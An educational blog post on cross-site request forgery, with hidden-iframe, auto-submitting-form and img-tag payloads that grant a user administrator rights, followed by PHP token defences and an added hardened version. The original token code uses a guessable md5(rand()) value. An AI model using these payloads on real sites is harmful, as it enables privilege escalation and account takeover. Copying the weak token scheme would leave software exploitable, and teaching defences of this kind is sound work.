Tuesday, 22 January 2013

(CSRF) Cross Site Request Forgery

The content of this article is meant for educational purposes only. Neither I, nor my web host will be held responsible for what you decide to do with this knowledge.

_______________________________________________________________________________


CSRF attacks are used for a variety of reasons by attackers. The most common being:
Logging out a user
Transferring money
Changing a password
Modifying information
All of the above are performed from the victim's own account.

A CSRF attack is fairly simple to carry out, yet it can also be fairly difficult to detect. The reason it is hard to detect is that every action appears to have been performed by a legitimate, logged-in user.

There are a few ways that an attacker may perform a CSRF attack but in this post we are going to cover the 2 most popular ways:

_______________________________________________________________________________

Code:
XSS
IMG Injection

_______________________________________________________________________________

XSS
For the XSS method to work, we need to inject JavaScript into the target site and have it issue a request as the victim user. One example of how this could be used would be to promote a user to admin status.

If the admin page reads its input from $_GET or $_REQUEST, the following would work:

_______________________________________________________________________________

Code:
<iframe src='javascript:window.location="http://www.vulnsite.com/admin.php?edituser=v3nd3tta&addgroup=administrator";' height='0' width='0' style='border:0;'></iframe>

_______________________________________________________________________________

The height, width and style attributes hide the iframe, so the administrator doesn't suspect anything when the frame silently loads the admin.php page.

If the admin page reads its input from $_POST, the following would work.

1. Create a web page hosted somewhere online and use code similar to the following, changing the form inputs as necessary:

_______________________________________________________________________________

Code:
<html>
<body>
<form action="" method="post" id="formid">
    <input type="hidden" name="attack" value="valuegoeshere" />
</form>
<script>document.getElementById('formid').submit();</script>
</body>
</html>

_______________________________________________________________________________

2. Embed that page with an iframe on the XSS-vulnerable page, as follows:

_______________________________________________________________________________

Code:
<iframe src='http://www.evilsite.com/csrfrider.php' height='0' width='0' style='border:0;'></iframe>

_______________________________________________________________________________


This will cause the form to post automatically to the administration page if an administrator loads it. As it is hidden in the iframe, it requires little to no social engineering to get the administrator to load the page.

IMG Injection
This is another popular method of hiding a CSRF attack, this time with the use of "img" tags. It is extremely popular on bulletin board systems, because img tags often receive little to no checking.

Embedding the CSRF attack within [img] tags will in turn look like the following in the HTML source:

_______________________________________________________________________________

Code:
<img src='http://www.example.com/admin.php?edituser=v3nd3tta&addgroup=administrator' />

_______________________________________________________________________________

When the admin views the page, the request is sent from his browser and the attack takes place without him ever realising it.

Protection
While using the POST method for all forms will help to safeguard against CSRF attacks, it is not at all bulletproof. The recommended way to protect against CSRF attacks is to use unique tokens on forms. A token is used within a hidden element in a form to prove that the request is not being forged. Each token is unique to the user, and is stored in the user's session. To set up tokens, use the following code:

_______________________________________________________________________________

Code:
session_start();
/* Create one token per session; it stays the same for the life of the session */
if( !isset( $_SESSION['token'] ) )
{
    /* Note: rand() is not a cryptographic RNG, so a token built from it is guessable */
    $token = md5( rand() );
    $token = str_split( $token, 10 ); /* keep only the first 10 hex characters */
    $_SESSION['token'] = $token[0];
}

_______________________________________________________________________________

The above will create the token and store it in the user's session. A hidden input carrying the token then has to be placed inside the form, as follows:

_______________________________________________________________________________

Code:
<input type='hidden' name='token' value='<?=$_SESSION['token']?>' />

_______________________________________________________________________________

The third part of the token check is to add the validation as follows:

_______________________________________________________________________________

Code:
/* isset() avoids an undefined-index notice when no token is posted;
   === avoids PHP's loose numeric-string comparison (e.g. "0e12345678" == "0") */
if( isset( $_POST['token'] ) && $_POST['token'] === $_SESSION['token'] )
{
    /* Token is valid, continue */
}

_______________________________________________________________________________
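The same three-part scheme (generate, embed, validate) written the way it would be hardened on a current PHP 7+ install. This is an added example, not code from the original post: it swaps md5(rand()) for the random_bytes() CSPRNG, refuses tokens arriving on anything but a POST (so the GET and img-tag variants above cannot carry one), and compares with hash_equals() instead of ==. The form action "admin.php" and the field name "token" are assumed to match the post's examples.

```php
<?php
// Added example (not from the original post): hardened CSRF token handling.
session_start();

// One unguessable token per session, from the CSPRNG, full 32 hex characters
// rather than a 10-character slice of md5(rand()).
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(16));
    }
    return $_SESSION['csrf_token'];
}

// The hidden field for the form; htmlspecialchars keeps the markup well-formed.
function csrf_field(): string
{
    return "<input type='hidden' name='token' value='"
         . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . "' />";
}

// Validate a submitted token. Differences from the plain == check in the post:
// the request must be a POST, the field must be present and a string (no
// undefined-index notice, no array trick), and the comparison is constant-time
// and strict (no "0e..." == "0" type juggling, no timing leak).
function csrf_check(array $post, string $method): bool
{
    if ($method !== 'POST' || !isset($post['token']) || !is_string($post['token'])) {
        return false;
    }
    // hash_equals(known, user_supplied): the known value goes first.
    return hash_equals(csrf_token(), $post['token']);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check($_POST, $_SERVER['REQUEST_METHOD'])) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    /* Token is valid, continue with the state-changing action */
}
?>
<form action="admin.php" method="post">
    <?= csrf_field() ?>
    <input type="submit" value="Save" />
</form>
```

A forged request from another origin cannot read the session-bound token out of the hidden field, so even a perfectly disguised iframe or img request fails the check.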
